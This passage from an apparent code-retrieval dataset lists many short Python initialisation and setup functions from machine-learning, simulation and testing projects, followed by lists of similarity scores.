if 'dis' in str(var):\n self.list_dis.append(var)\n optimizer_dis = tf.train.AdamOptimizer(learning_rate=self.relative_lr*0.0002,beta1=0.5)\n self.opt_dis = optimizer_dis.minimize(self.loss_dis_A + self.loss_dis_B,var_list=self.list_dis)", "def init():\n\n # Complete our stop words set.\n add_extra_words()\n\n model = read_model(MODEL_FILE)\n model_keys = list(model.keys())\n\n # Basic random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=random.choice(model_keys))\n\n # Selective random.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix(model_keys))\n\n # Context-aware.\n new_comment = generate_comment(model=model, order=2,\n number_of_sentences=2,\n initial_prefix=get_prefix_with_context(model, \"Agent_Phantom\"))\n\n print(new_comment)", "def generator_setup():\n PaaSPureGenerator()", "def __init__(self):\n\n self.parser = self.define_parser()\n self.pen = Pen()", "def Init(ss):\n rand.Seed(ss.RndSeed)\n ss.UpdateEnv()\n ss.StopNow = False\n ss.SetParams(\"\", False)\n ss.NewRun()\n ss.UpdateView(True)", "def __init__(self, dim, rn, gammak, sine=False, feature_generator=None):\n\n\t\tself.dim = dim\n\t\tself.rn = rn\n\t\tself.gammak = gammak\n\n\t\tif feature_generator is None:\n\t\t\tself.feature_generator = GaussianRandomFeatures(self.dim, self.rn, self.gammak, sine=sine)\n\t\telse: self.feature_generator = feature_generator", "def __init__(self, sid, split, library, style, **pargs):\n\n if 'print' not in pargs:\n pargs['print'] = (10**4, 'time', 'dt', 'atoms')\n\n self.rank = split.Get_rank()\n self.split = split\n self.pargs = pargs\n self.monitorList = []\n self.vars = {}\n self.path = os.getcwd()\n self.nSS = len(self.pargs['species'])\n self.output = self.pargs['output']\n self._dir, _ = __file__.split(__name__.split('PyGran.simulation.')[-1] + '.py')\n self._monitor = [] # a list of tuples of (varname, filename) to monitor\n\n if '__version__' in pargs:\n self.__version__ = self.pargs['__version__']\n\n if not self.rank:\n global logging\n\n logging = import_module(name='logging')\n\n logging.basicConfig(filename='pygran.log', format='%(asctime)s:%(levelname)s: %(message)s', level=logging.DEBUG)\n\n logging.info(\"Working in {}\".format(self.path))\n logging.info('Creating i/o directories')\n\n if not os.path.exists(self.pargs['traj']['dir']):\n os.makedirs(self.pargs['traj']['dir'])\n\n if self.pargs['restart']:\n if not os.path.exists(self.pargs['restart'][1]):\n os.makedirs(self.pargs['restart'][1])\n\n logging.info('Instantiating LIGGGHTS object')\n\n self.lmp = liggghts(comm=self.split, library=library.strip(), cmdargs=['-log', 'liggghts.log'])\n\n if not self.rank:\n logging.info('Setting up problem dimensions and boundaries')\n\n self.lmp.command('units {}'.format(self.pargs['units']))\n\n if hasattr(self, '__version__'): \n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n else:\n # Get version from version_liggghts.txt. TODO: find a faster way to do this.\n try:\n version_txt = find('version_liggghts.txt', '/')\n self.__liggghts__ = version_txt.split('version_liggghts.txt')[0]\n\n with open(version_txt, 'r+') as fp:\n major, minor, _ = fp.readline().rstrip().split('.')\n self.__version__ = float(major + '.' + minor)\n except:\n if not self.rank:\n print('Could not find LIGGGHTS version. Proceeding ... ')\n self.__version__ = 'unknown'\n self.__liggghts__ = 'n/a'\n\n # Write version + src dir to config file if it exists\n if not self.rank:\n if os.path.isfile(self._dir + '../.config'):\n with open(self._dir + '../.config', 'a+') as fp:\n fp.write('\\nversion={}'.format(self.__version__))\n fp.write('\\nsrc={}'.format(self.__liggghts__))\n if self.__version__ >= 3.6:\n self.lmp.command('hard_particles yes')\n\n self.lmp.command('dimension {}'.format(self.pargs['dim']))\n self.lmp.command('atom_style {}'.format(style))\n self.lmp.command('atom_modify map array') # array is faster than hash in looking up atomic IDs, but the former takes more memory\n self.lmp.command('boundary ' + ('{} ' * len(pargs['boundary'])).format(*pargs['boundary']))\n self.lmp.command('newton off') # turn off newton's 3rd law ~ should lead to better scalability\n self.lmp.command('communicate single vel yes') # have no idea what this does, but it's imp for ghost atoms\n self.lmp.command('processors * * *') # let LIGGGHTS handle DD", "def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.__iteration_number = kwargs['iteration_number']\n self.__particles = [\n PSOParticle(**kwargs, bit_generator=self._random)\n for _ in range(kwargs['particles'])\n ]\n\n # The library stores particles in the visualizer .... groan\n positions = [particle.position for particle in self.__particles]\n self._visualizer = NoVisualizer(**kwargs)\n self._visualizer.add_data(positions=positions)", "def create_generators(cfg, backbone):\n if cfg.anchor_params:\n if 'small' in cfg.anchor_params:\n anchor_params = AnchorParameters.small\n else:\n anchor_params = None\n else:\n anchor_params = None\n\n common_args = {\n 'batch_size': cfg.batchsize,\n 'config': None,\n 'image_min_side': cfg.image_size[0],\n 'image_max_side': cfg.image_size[1],\n 'filter_annotations_enabled': False,\n 'preprocess_image': backbone.preprocess_image,\n 'normalize_radar': cfg.normalize_radar,\n 'camera_dropout': cfg.dropout_image,\n 'radar_dropout': cfg.dropout_radar,\n 'channels': cfg.channels,\n 'distance': cfg.distance_detection,\n 'sample_selection': cfg.sample_selection,\n 'only_radar_annotated': cfg.only_radar_annotated,\n 'n_sweeps': cfg.n_sweeps,\n 'noise_filter': cfg.noise_filter_cfg,\n 'noise_filter_threshold': cfg.noise_filter_threshold,\n 'noisy_image_method': cfg.noisy_image_method,\n 'noise_factor': cfg.noise_factor,\n 'perfect_noise_filter': cfg.noise_filter_perfect,\n 'radar_projection_height': cfg.radar_projection_height,\n 'noise_category_selection': None if cfg.class_weights is None else cfg.class_weights.keys(),\n 'inference': cfg.inference,\n 'anchor_params': anchor_params,\n }\n\n # create random transform generator for augmenting training data\n if cfg.random_transform:\n transform_generator = random_transform_generator(\n min_rotation=-0.1,\n max_rotation=0.1,\n min_translation=(-0.1, -0.1),\n max_translation=(0.1, 0.1),\n min_shear=-0.1,\n max_shear=0.1,\n min_scaling=(0.9, 0.9),\n max_scaling=(1.1, 1.1),\n flip_x_chance=0.5,\n flip_y_chance=0.0,\n )\n else:\n transform_generator = random_transform_generator(flip_x_chance=0.5)\n\n category_mapping = cfg.category_mapping\n\n if 'nuscenes' in cfg.data_set:\n # import here to prevent unnecessary dependency on nuscenes\n from crfnet.data_processing.generator.nuscenes_generator import NuscenesGenerator\n from nuscenes.nuscenes import NuScenes\n\n if 'mini' in cfg.data_set:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n else:\n try:\n nusc = NuScenes(version='v1.0-trainval', dataroot=cfg.data_path, verbose=True)\n except ValueError:\n nusc = NuScenes(version='v1.0-mini', dataroot=cfg.data_path, verbose=True)\n\n\n if 'debug' in cfg.scene_selection or 'mini' in cfg.data_set:\n scenes = Scenes.debug\n else:\n scenes = Scenes.default\n\n train_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.train,\n transform_generator=transform_generator,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n shuffle_groups=True,\n group_method='random',\n **common_args\n )\n\n # no dropouts in validation\n common_args['camera_dropout'] = 0\n common_args['radar_dropout'] = 0\n\n validation_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.val,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_night_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_night,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n\n test_rain_generator = NuscenesGenerator(\n nusc,\n scene_indices=scenes.test_rain,\n category_mapping=category_mapping,\n compute_anchor_targets=anchor_targets_bbox,\n compute_shapes=guess_shapes,\n **common_args\n )\n return train_generator, validation_generator, test_generator, test_night_generator, test_rain_generator\n else:\n raise ValueError('Invalid data type received: {}'.format(cfg.data_set))", "def init(self, rng_key, num_warmup, init_params, model_args, model_kwargs):\n raise NotImplementedError", "def init():\n global neural_network\n global labels\n\n # load objects required by run() for inferencing\n model_dir = Model.get_model_path(\"mnist-fashion\")\n # neural model\n neural_network = keras.models.load_model(f\"{model_dir}/neural-network.h5\")\n # labels\n with open(f\"{model_dir}/labels.jsonpickle\", \"r\") as labels_file:\n labels = jsonpickle.decode(labels_file.read())", "def __init__(self,args,graph):\n self.args = args\n self.graph = graph\n self.targets = overlap_generator(self.args.target_weighting, self.graph)\n self.weights = overlap_generator(self.args.regularization_weighting, self.graph)\n self.nodes = self.graph.nodes()\n self.vocab_size = len(self.nodes)\n self.true_step_size = ((len(self.weights.keys()) / 2) * args.batch_size * self.args.epochs)\n self.edges = nx.edges(self.graph)\n self.build()", "def do_init(self):\n\n pass", "def __init_accessors (self):\n self.colors = ay.utils.Colors\n self.layout = Layout(self.seed)\n self.shapes = Shapes", "def __init__(self):\n # Passing the class make this Python 2 and Python 3 compatible\n super(MayaSceneLevelGeneratorUI, self).__init__(parent=maya_main_window())\n\n # Create the generators needed\n self._level_gen = level.LevelGenerator([blocks.BlockFile(\"\", blk_type) for blk_type in VALID_BLOCK_TYPES])\n self._scene_gen = MayaSceneLevelGenerator(None) # Fill in level at button press time\n\n # Window things\n self.setWindowTitle(\"Maya Scene Level Generator\")\n self.resize(500, 200)\n self.setWindowFlags(self.windowFlags() ^ PySide2.QtCore.Qt.WindowContextHelpButtonHint)\n\n # Set up for the first time\n self._create_widgets()\n self._create_layout()\n self._refresh_view()\n self._create_connections() # Order matters, since refreshing triggers connections\n\n print(self._level_gen.block_list) # TODO delete", "def create_initial_graph(self):\n # Initialise weights\n for link in self.gene_links:\n link.weight = random.uniform(weight_init_min, weight_init_max)\n # Initialise biases\n for node in self.gene_nodes:\n node.bias = random.uniform(bias_init_min, bias_init_max)\n if node.can_modify:\n node.act_func = self.act_set.get_random_activation_func()\n if node.act_func in [activations.gaussian, activations.sin]:\n if node.act_func.__name__[0] == \"g\":\n node.freq += random.uniform(-guass_freq_adjust, guass_freq_adjust)\n elif node.act_func.__name__[0] == \"s\":\n node.freq += random.uniform(-sin_freq_adjust, sin_freq_adjust)\n node.amp += random.uniform(-func_amp_adjust, func_amp_adjust)\n node.vshift += random.uniform(-func_vshift_adjust, func_vshift_adjust)", "def init():\r\n\t# add grabber tools based on proxy tools\r\n\tfor proxyWrapper in vizconnect.getToolsWithMode('Proxy'):\r\n\t\tgrabberTool = tools.grabber.HandGrabber(usingPhysics=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tusingSprings=False,\r\n\t\t\t\t\t\t\t\t\t\t\t\tplacementMode=tools.placer.MODE_DROP_DOWN)\r\n\t\t\r\n\t\tname = 'grabber_tool_based_on_'+proxyWrapper.getName()\r\n\t\tgrabberWrapper = vizconnect.addTool(raw=grabberTool,\r\n\t\t\t\t\t\t\t\t\t\t\tname=name,\r\n\t\t\t\t\t\t\t\t\t\t\tmake='Virtual',\r\n\t\t\t\t\t\t\t\t\t\t\tmodel='Grabber')\r\n\t\t# parent the grabber wrapper to the proxy's parent\r\n\t\tgrabberWrapper.setParent(proxyWrapper)\r\n\t\t\r\n\t\tgrabberTool.setItems(grabbableItems)\r\n\t\r\n\tviz.callback(viz.getEventID('RESET_THE_LOFT_LAYOUT'), lambda e: resetMovedObjects())", "def setup_class(self):\n\n from scipy.spatial import cKDTree\n\n shape = (500, 500)\n\n # define random star positions\n nstars = 50\n from astropy.utils.misc import NumpyRNGContext\n with NumpyRNGContext(12345): # seed for repeatability\n xx = np.random.uniform(low=0, high=shape[1], size=nstars)\n yy = np.random.uniform(low=0, high=shape[0], size=nstars)\n\n # enforce a minimum separation\n min_dist = 25\n coords = [(yy[0], xx[0])]\n for xxi, yyi in zip(xx, yy):\n newcoord = [yyi, xxi]\n dist, distidx = cKDTree([newcoord]).query(coords, 1)\n if np.min(dist) > min_dist:\n coords.append(newcoord)\n yy, xx = np.transpose(coords)\n\n with NumpyRNGContext(12345): # seed for repeatability\n zz = np.random.uniform(low=0, high=200000., size=len(xx))\n\n # define a table of model parameters\n self.stddev = 2.\n sources = Table()\n sources['amplitude'] = zz\n sources['x_mean'] = xx\n sources['y_mean'] = yy\n sources['x_stddev'] = np.zeros(len(xx)) + self.stddev\n sources['y_stddev'] = sources['x_stddev']\n sources['theta'] = 0.\n\n self.data = make_gaussian_sources_image(shape, sources)\n self.nddata = NDData(self.data)\n\n init_stars = Table()\n init_stars['x'] = xx.astype(int)\n init_stars['y'] = yy.astype(int)\n self.init_stars = init_stars", "def setup(self):\n\n self.parser = GingerIt()", "def init():\n global balls, super_balls\n\n balls = [gen_ball() for _ in range(number_of_balls)]\n super_balls = []\n generate_velocity_all_balls()", "def initialize_ai(self):\n\n self.gid, self.genome = constants.genomes_to_run[self.identifier]\n self.genome.fitness = -1\n self.net = neat.nn.FeedForwardNetwork.create(self.genome, constants.conf)\n # self.net = neat.nn.RecurrentNetwork\n # .create(self.genome, constants.conf)", "def setup_class(self):\n args = {'pdb_path':'/sdf/home/a/apeck/tomoxtal/examples/input/193l.pdb', 'resolution':6.0, 'size':250}\n\n # generate structure factors and retrieve associated cell information\n sf = cctbx_tools.reference_sf(args['pdb_path'], args['resolution'], expand_to_p1=True)\n sf_data = cctbx_tools.reformat_sf(sf)\n sg_symbol, sg_no, self.cell, cs = cctbx_tools.unit_cell_info(args['pdb_path'])\n \n # add random phase shifts\n hklIp1, hklIp2, hklIp3 = sf_data.copy(), sf_data.copy(), sf_data.copy()\n hklIp2[:,-1], self.shifts2 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n hklIp3[:,-1], self.shifts3 = phases_utils.add_random_phase_shift(sf_data[:,:3], sf_data[:,-1])\n\n # retain subset of Millers\n for data in [hklIp1,hklIp2,hklIp3]:\n keep_idx = np.unique(np.random.randint(0, high=data.shape[0], size=args['size']))\n data = data[keep_idx]\n \n self.data1, self.data2, self.data3 = hklIp1, hklIp2, hklIp3\n fshifts_list = np.random.uniform(size=(4,3))\n self.fshifts_list = np.vstack((fshifts_list, 1-self.shifts2, 1-self.shifts3))", "def _init_anim(self):\n pass", "def __init__(self, *args, **kwargs):\n _gdi_.Palette_swiginit(self,_gdi_.new_Palette(*args, **kwargs))", "def setup(self):\n for gen in self._generators:\n gen.setup()", "def __init__(self):\n self.model = {'mol':[], 'nmol':0}\n self.template = {} \n self.config = {}\n self.config['tfile'] = 'gau-template-bsse.gjf'\n self.config['xyzfile'] = 'model.xyz'\n self.config['jobfile'] = 'gau.gjf'\n self.config['job_prefix'] = self.config['jobfile'].split(\".\")[0]\n self.config['incr'] = 1\n \n self.rd_cmd_stream()\n return", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def init(self):\n pass", "def __init__(self, opt: argparse.Namespace) -> None:\n super().__init__(opt)\n\n self.gpu_ids = opt.gpu_ids\n self.is_train = opt.is_train\n self.output_nch = opt.output_nch\n self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu')\n\n # generator module\n self._generator_module = generator_modules[opt.generator_module_name](opt)\n apply_init_weight(self._generator_module, opt, init_weight=init_weights[opt.init_weight_name])\n if self.is_train:\n # discriminator module\n self._discriminator_module = discriminator_modules[opt.discriminator_module_name](opt)\n apply_init_weight(self._discriminator_module, opt, init_weight=init_weights[opt.init_weight_name])\n # generator optimizer\n self._generator_optimizer = optimizers[opt.generator_optimizer_name](self._generator_module.parameters(), opt)\n # discriminator optimizer\n self._discriminator_optimizer = optimizers[opt.discriminator_optimizer_name](self._discriminator_module.parameters(), opt)\n # generator scheduler\n self._generator_scheduler = schedulers[opt.generator_scheduler_name](self._generator_optimizer, opt)\n # discriminator scheduler\n self._discriminator_scheduler = schedulers[opt.discriminator_scheduler_name](self._discriminator_optimizer, opt)\n\n # register\n if not self.is_train:\n self.modules['generator'] = self._generator_module\n else:\n self.modules['generator'] = self._generator_module\n self.modules['discriminator'] = self._discriminator_module\n self.optimizers['generator'] = self._generator_optimizer\n self.optimizers['discriminator'] = self._discriminator_optimizer\n self.schedulers['generator'] = self._generator_scheduler\n self.schedulers['discriminator'] = self._discriminator_scheduler\n\n self.module_transfer_to_device()", "def initialize_trainer(self):\n self.initialize_matrices()\n self.initialize_model()\n self.initialize_optimizers()\n return self", "def __init__(self, model, n_pix=1, strategy='rand1bin', max_iter=100, popsize=400,\n init='normal', target=None, args=None, **kwargs):\n self.model = model\n self.n_pix = n_pix\n self.strategy = strategy\n self.max_iter = max_iter\n self.popsize = popsize\n self.init = init\n self.target = target\n self.args = args\n self.kwargs = kwargs\n\n self.step_meter = AverageMeter()", "def setUp(self) -> None:\n self.random = np.random.RandomState(seed=42)", "def __init__(self, skin_directory):\n self.ax = None\n self.generate_axis()\n self.skin_directory = skin_directory\n self.figure = plt.gcf()", "def init(self) -> None:\n ...", "def initialise_rng(self):\n\n\t\tself.rng = numpy.random.RandomState()", "def __init__(self, init_pos, init_stdev, num_particles, sense_noise):\n self.particles = np.random.multivariate_normal(\n init_pos, [[init_stdev**2, 0], [0, init_stdev**2]], num_particles)\n self.weights = np.array(\n [1. / num_particles for _ in range(num_particles)])\n self.n = num_particles\n self.sense_noise = sense_noise", "def setup(self):\n self.star_list = arcade.SpriteList()\n\n for i in range(50):\n # Create snowflake instance\n singlestar = Singlestar()\n # Add snowflake to snowflake list\n self.star_list.append(singlestar)\n\n # Don't show the mouse pointer\n self.set_mouse_visible(False)\n\n # Set the background color\n arcade.set_background_color(arcade.color.BLACK)", "def initialize(self):\n self.gc1.reset_parameters()\n self.gc2.reset_parameters()\n\n for s in self.scores:\n stdv = 1. / math.sqrt(s.size(1))\n s.data.uniform_(-stdv, stdv)\n for b in self.bias:\n # fill in b with postive value to make\n # score s closer to 1 at the beginning\n b.data.fill_(self.bias_init)\n\n for Dk in self.D_k:\n stdv = 1. / math.sqrt(Dk.size(1))\n Dk.data.uniform_(-stdv, stdv)\n\n for b in self.D_bias:\n b.data.fill_(0)", "def __init__(self, **kwargs):\n super(VeryCleverBeamsplitter, self).__init__(**kwargs)\n self.shader_source = IL_SHADER_SOURCE\n self.centre = [0.5, 0.5]\n self.blazing_function = np.linspace(0,1,32)\n self.zernike_coefficients = np.zeros(12)", "def __init__(self):\n self.last_reward_pos = 0\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0\n self.stump_spacing = 4.0\n self.stump_height = 1.0\n self.my_init({'leg_length': 35, 'walker_type': 'default'})", "def gff_init():\n pass", "def __init__(self):\n\t\t# Setup fonts\n\t\tself.large_font = self._get_font(1,Annotator.THICK)\n\t\tself.large_font_outline = self._get_font(1,Annotator.THICK + Annotator.BORDER)\n\t\t\n\t\tself.small_font = self._get_font(0.5,Annotator.THIN)\n\t\tself.small_font_outline = self._get_font(0.5,Annotator.THIN + Annotator.BORDER)\n\t\t\n\t\t# Text colour\n\t\tself.colour = Annotator.COLOUR_BUSY\n\t\t\n\t\tself.forehead = (0,0,1,1)\n\t\tself.face = (0,0,1,1)", "def generate_gazettes(self):\n # TODO: generate_gazettes\n pass", "def __init__(self, styles, nature):\n #: Dictionary of key-value pairs, where *keys* are the style names.\n self.styles = styles\n\n #: Cell *nature* used to distinguish the body cells, from the header and the footer.\n self.nature = nature", "def init_model(model):\n model(tf.random.uniform((1, 512, 512, 3)))", "def __init__(self, *args):\n _hypre.HypreBoomerAMG_swiginit(self, _hypre.new_HypreBoomerAMG(*args))", "def init(self):\n sys_init_lines = CodeWriter.write_init()\n self.init_lines.extend(sys_init_lines)", "def init(init_state) -> GelmanRubinState:\n n_chains, n_dims = init_state.position.shape\n w_state = w_init(n_chains, n_dims)\n return GelmanRubinState(w_state, 0, jnp.nan)", "def feed_parser_initialization(generator):\n\n generator.plugin_instance = GitHubActivity(generator)", "def initialize( self, layout, numGhostAgents=1000 ):\n self.data.initialize(layout, numGhostAgents) ##self.data is defined in the Grid() class of game.py REF112.It creates an initial game state from a layout array (see layout.py).", "def __init__(\n self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def __init__(self, generator:Model,\n discriminator:Model,\n latent_dim:Optional[Union[int, Tuple]]=None,\n n_disc:int=3,\n epochs:int=100, \n batch_size:int=32,\n optimizer:Optional[Union[str, Dict]]=None,\n optimizer_kwargs:Optional[Dict]=None,\n name:str='QGAN',\n random_state:Optional[int]=None,\n checkpoint_dir:Optional[str]=None,\n checkpoint_interval:int=10,\n checkpoint_max_to_keep:Optional[int]=None):\n super().__init__(generator=generator,\n discriminator=discriminator,\n latent_dim=latent_dim,\n n_disc=n_disc,\n epochs=epochs,\n batch_size=batch_size,\n optimizer=optimizer,\n optimizer_kwargs=optimizer_kwargs,\n name=name,\n random_state=random_state,\n checkpoint_dir=checkpoint_dir,\n checkpoint_interval=checkpoint_interval,\n checkpoint_max_to_keep=checkpoint_max_to_keep)", "def generate(self):\n self.generate_points()\n self.generate_edges()", "def __init__( self, config: 'bittensor.config' = None ):\n if config == None: config = neuron.config()\n self.config = config; neuron.check_config( self.config ); print ( self.config )\n bittensor.logging (\n config = self.config,\n logging_dir = self.config.neuron.full_path,\n )\n self.device = torch.device(\n device = self.config.neuron.device\n )\n self.wallet = bittensor.wallet(\n config = self.config\n )\n self.dendrite = bittensor.dendrite(\n config = self.config,\n wallet = self.wallet\n )\n self.subtensor = bittensor.subtensor(\n config = self.config\n )\n self.metagraph = bittensor.metagraph(\n config = self.config\n )\n self.axon = bittensor.axon (\n config = self.config,\n wallet = self.wallet,\n forward_callback = self.forward,\n backward_callback = self.backward\n )\n self.dataset = bittensor.dataloader (\n config = self.config\n )\n self.router = SGMOERouter(\n config = self.config\n ).to( self.device )\n self.nucleus = GPT2Nucleus(\n config = self.config,\n routing_callback = self.route\n ).to( self.device )\n self.optimizer = torch.optim.SGD(\n [\n {\"params\": self.router.parameters()},\n {\"params\": self.nucleus.parameters()}\n ],\n lr = self.config.neuron.learning_rate,\n weight_decay = self.config.neuron.weight_decay,\n )\n self.tensorboard = SummaryWriter(\n log_dir = self.config.neuron.tensorboard_dir\n )\n self.mechanism_weights = torch.ones( [0] )\n self.epoch = 0\n self.global_step = 0\n self.epoch_loss = math.inf/2\n self.best_epoch_loss = math.inf", "def init_data_generator(config_tuple, data_dir):\n\n (_preprocess_function, flags) = config_tuple\n rescale = 1. / 255 if _preprocess_function is None else None\n image_sizes = (flags.image_width, flags.image_height)\n batch_size = flags.batch_size\n # Configure test generator\n train_datagen = ImageDataGenerator(\n preprocessing_function=_preprocess_function,\n rescale=rescale,\n rotation_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n horizontal_flip=True\n )\n # Configure test data flow\n train_generator = train_datagen.flow_from_directory(\n data_dir,\n target_size=image_sizes,\n batch_size=batch_size,\n )\n\n return train_generator", "def __init__(self):\n self.monsters_images = pg.sprite.Group()\n self.font_23 = pg.font.Font(prepare.FONTS['Timeless-Bold'], 23)\n self.font_20 = pg.font.Font(prepare.FONTS['Timeless'], 20)\n self.font_18 = pg.font.Font(prepare.FONTS['Timeless'], 18)\n self.bold_font = pg.font.Font(prepare.FONTS['Timeless-Bold'], 17)\n self.font_15 = pg.font.Font(prepare.FONTS['Timeless'], 15)\n\n self.init_left_zone()\n self.init_middle_zone()\n self.init_right_zone()", "def initialise(self):", "def setUp(self):\n self.G = nx.DiGraph()", "def __init__(self, n, sick_init, social_dist, radius=0.01, styles=None, total_beds=10, box_length=1, recovery_time=1000):\n\n self.init_persons(n, sick_init, social_dist, radius, box_length, recovery_time, total_beds, styles)\n self.init_hospital(total_beds)", "def init(self):", "def init(self):", "def get_generator(upscale_factor, init_gain):\n net = Generator(upscale_factor)\n init_weights(net, 'normal', init_gain)\n return net", "def __init__(self, init_grid=None):\n\n self.height = len(init_grid)\n self.width = len(init_grid[0])\n\n self.grid = [[Cell(self, c) for c in row]\n for row in init_grid]\n\n self.g = nx.Graph()\n self.tangle()", "def run_init(self):\n InitEditor(self.root, self)", "def __init__(self, obs_dim, *, seed=None):\n # TODO: apply jax.jit() to everything in sight\n net_init, self._net_apply = self.make_stax_model()\n if seed is None:\n # oh well\n seed = np.random.randint((1 << 63) - 1)\n rng = jrandom.PRNGKey(seed)\n out_shape, self._net_params = net_init(rng, (-1, obs_dim))\n self._net_grads = jax.grad(self._net_apply)\n # output shape should just be batch dim, nothing else\n assert out_shape == (-1,), \"got a weird output shape %s\" % (out_shape,)" ]
[ "0.70487845", "0.644251", "0.63743216", "0.6038303", "0.5973697", "0.59719676", "0.5944061", "0.5878216", "0.5834873", "0.58195704", "0.5817429", "0.5784765", "0.5783701", "0.577011", "0.57584363", "0.57117826", "0.5703821", "0.5685936", "0.5671047", "0.5652533", "0.5648202", "0.5644233", "0.5643345", "0.5630216", "0.56297874", "0.5616319", "0.5612629", "0.5608074", "0.5607538", "0.5602886", "0.5597174", "0.55802935", "0.55463666", "0.55315226", "0.55303335", "0.5528203", "0.55185384", "0.5492478", "0.5490245", "0.5480318", "0.5479667", "0.5479187", "0.5459767", "0.5458566", "0.5454134", "0.54527843", "0.54508626", "0.5450451", "0.544978", "0.54433984", "0.54379183", "0.5426694", "0.5421105", "0.5418665", "0.5418569", "0.54063433", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5405244", "0.5383103", "0.5381276", "0.5380196", "0.53788584", "0.53728354", "0.53709114", "0.536323", "0.5352759", "0.5341801", "0.5341327", "0.53363895", "0.53284967", "0.5325164", "0.532388", "0.5323024", "0.5317661", "0.53127456", "0.5309524", "0.5299933", "0.52927876", "0.5291992", "0.52901864", "0.5287619", "0.52867115", "0.52846605", "0.5282077", "0.52765656", "0.52692837", "0.52659553", "0.5259445", "0.5256852", "0.52560925", "0.52560925", "0.52540183", "0.5250527", "0.52472764", "0.52439225" ]
0.0
-1
Remove weight normalization module from all of the layers.
def remove_weight_norm(self): def _remove_weight_norm(m): try: logging.debug(f"Weight norm is removed from {m}.") torch.nn.utils.remove_weight_norm(m) except ValueError: # this module didn't have weight norm return self.apply(_remove_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def remove_activation_hooks(self):\n for h in self.hooks:\n h.remove()\n h = None\n for l in self.list_mods:\n if ('norm' in self.list_mods):\n (b, l) = l\n # Skip non-prunable layers\n if (hasattr(l, 'prune_values')):\n l.prune_values = None\n self.hooks = None", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def remove_batchnorm(m: nn.Sequential) -> None:\n ms = list(m._modules.items())\n\n # transfer biases from BN to previous conv / Linear / Whatever\n for (name1, mod1), (name2, mod2) in zip(ms[:-1], ms[1:]):\n if isinstance(mod2, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n if mod1.bias is not None:\n continue\n\n if mod2.bias is not None:\n with torch.no_grad():\n mod1.bias = mod2.bias\n else:\n out_ch = len(mod2.running_mean)\n with torch.no_grad():\n mod1.bias = nn.Parameter(torch.zeros(out_ch))\n # remove bn\n for name, mod in ms:\n if isinstance(mod, (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)):\n delattr(m, name)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def RemoveBatchNormLayers(network, batch_norm_names):\n i = 0\n j = 0\n while i < len(network.layer) and j < len(batch_norm_names): \n if network.layer[i].name == batch_norm_names[j]:\n del network.layer[i]\n j += 1\n else:\n i += 1\n \n if j != len(batch_norm_names):\n print j, len(batch_norm_names)\n raise AssertionError('All batch norm layers were not removed')", "def 